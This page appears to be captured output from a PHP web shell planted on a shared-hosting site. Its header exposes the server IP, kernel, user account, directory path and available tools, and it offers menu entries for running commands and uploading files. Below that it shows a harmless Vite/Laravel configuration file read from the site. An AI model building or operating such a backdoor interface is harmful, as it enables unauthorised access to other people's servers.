Server IP : 162.241.203.66 / Your IP : 216.73.216.186 Web Server : Apache System : Linux br994.hostgator.com.br 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : devgen83 ( 6473) PHP Version : 8.2.22 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home4/devgen83/inovafaculdade.shop/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
import { defineConfig } from 'vite'; import laravel from 'laravel-vite-plugin'; import tailwindcss from '@tailwindcss/vite'; export default defineConfig({ plugins: [ laravel({ input: ['resources/css/app.css', 'resources/js/app.js'], refresh: true, }), tailwindcss(), ], });